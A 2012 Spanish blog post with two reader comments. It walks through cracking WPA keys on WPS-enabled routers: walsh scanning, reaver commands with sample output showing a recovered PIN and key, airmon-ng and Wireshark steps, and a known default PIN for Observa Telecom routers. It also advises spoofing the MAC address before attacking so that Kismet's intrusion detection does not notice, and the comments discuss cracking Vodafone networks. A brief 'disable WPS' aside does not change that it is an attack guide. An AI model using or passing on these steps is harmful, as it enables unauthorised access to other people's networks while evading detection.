English plantillas curriculums vitae French cartas de amistad German documental Spain cartas de presentación Italian xo Dutch películas un link Russian templates google Portuguese foro de coches Japanese catálogos de Korean entrevistas a Arabic Chinese Simplified

TIENDAS WIFI:


Lo mejor en calidad-precio y rapidez bajo nuestra humilde opinión.
eiUFj

lunes, 30 de abril de 2012

WPA al descubierto gracias al WPS del router y sin hacer falta diccionarios:


Muy Buenas a todos,os dejo esto por aqui que supongo que os interesara bastante:


Se ha descubierto una vulnerabilidad en el estándar WPS (Wi-Fi Protected
Setup) que podría comprometer la robustez del PIN.


Wi-Fi Protected Setup, o WPS por sus siglas, es un estándar incluido
en muchos routers y dispositivos wifi que facilita a los usuarios la
creación de redes inalámbricas seguras. Dicho estándar dispone de
varios métodos para agregar dispositivos a una red:
* a través de un número PIN de 8 dígitos
* pulsando un botón de configuración (PBC o Push Button Configuration)
* mediante NFC (Near-Field Communication) acercando los dispositivos al
punto de acceso o router
* utilizando una llave USB que almacena los datos de la configuración


El estándar WPS lo implementan productos de fabricantes como Cisco,
Technicolor, TP-Link, ZyXEL, D-Link, Netgear, Linksys, y Buffalo, entre
otros muchos.


Vamos a ver un ejemplo practico:Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)




1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables


Walsh v1.3


Required Arguments:
   -i, --interface=<iface>              Interface to capture packets on
   -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files


Optional Arguments:
   -c, --channel=<num>                  Channel to listen on [auto]
   -o, --out-file=<file>                Write data to file
   -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
   -C, --ignore-fcs                     Ignore frame checksum errors
   -5, --5ghz                           Use 5GHz 802.11 channels
   -s, --scan                           Use scan mode
   -u, --survey                         Use survey mode [default]
   -h, --help                           Show help


Ejemplo de uso:   walsh -i mon0


Scanning for supported APs...


00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX


Lo debeis parar con control+c


2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)


Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv


Resultado


    94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
    WPS PIN: '5XXXXXXX'
    WPA PSK: '1XXXXXXXXX'
    AP SSID: 'ONOXXXX'




Así que ya sabeis que debeis deshabilitar el WPS de vuestro router chavales.


P.D: La herramienta Walsh para detectar AP´s vulnerables al ataque no funciona en Wifiway,no se el por que,quiza sea beta o quiza este mal programada la utilidad,cuando lo sepa os lo pongo en este mismo post.


P.D: Tengo una manera de saber AP´s vulnerables con una utilidad de mi rt3070,la cual me permite conectarme a cualquier red,teniendo la clave claro xD,lo mejor es eso,que me dice los AP,s que tienen WPS activado,mirad la foto:


http://imageshack.us/f/46/sinttuloapy.png/ REAVER SOLO FUNCIONA CON ROUTERS CON WPS ACTIVADO.


Pero tambien se puede averiguar con Wireshark por si no teneis esa antena ni ese programa:


Ponemos la tarjeta en modo monitor:


airmon-ng start wlan0 (suponiendo que sea wlan0 y no wlan1...etc)


Abrimos el wireshark y en las opciones de captura elegimos interfaz mon0, o la que nos haya dado el airmon. Nos aseguramos que no esté seleccionada ninguna opción tal que así:


http://imageshack.us/f/207/wireshark.png/


Le damos a Start


Empezará a capturar paquetes. Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:


----->IEEE 802.11 wireless LAN management frame
----------->Tagged parameters:
--------------> Tag: Vendor Specific: Microsoft WPS


Aqui esta el ejemplo:


http://imageshack.us/f/803/wireshark2.png/


Añado una cosa mas que se olvidaba:


Según indican en la página del proyecto la versión svn de kismet detecta los ataques "WPS BruteForce"


http://blog.kismetwireless.net/2012/01/reaver-wps-brute-force-ids.html


Os dejo una imagen para que veais mejor: http://imageshack.us/f/688/reaverkismet.png/


Asi que antes de usar reaver no esta nada mal cambiar la mac a una aleatoria que se os ocurra


P.D: Pongo algo nuevo por que es importante,las redes WLAN_XXXX routers Observa Telecom 00:19:15:XX:XX:XX,el PIN que traen por defecto es 12345670,como podeis ver la clave salta en 10 segundos por que la version de reaver 1.4 prueba ese pin en el primer intento,en esta imagen se comprueba: http://imageshack.us/f/689/reaverz.png/

2 comentarios:

  1. Pues a mí en una vodafone_xxxx me ha resultado imposible.Ni siquiera se asocia al router, incluso cambiando la mac por la de cliente asociado.Creo que estas redes son seguras al cien por cien.

    ResponderEliminar
  2. El patron de vodafonexxxx se ha descubierto ya, se esta trabajando para hacer un programa k te saque la clave automaticamente.... aunque si el cliente desactivo el WPS de su router evidentemente aunk cambies tu mac x la del cliente no conseguiras acceder...un saludo.

    ResponderEliminar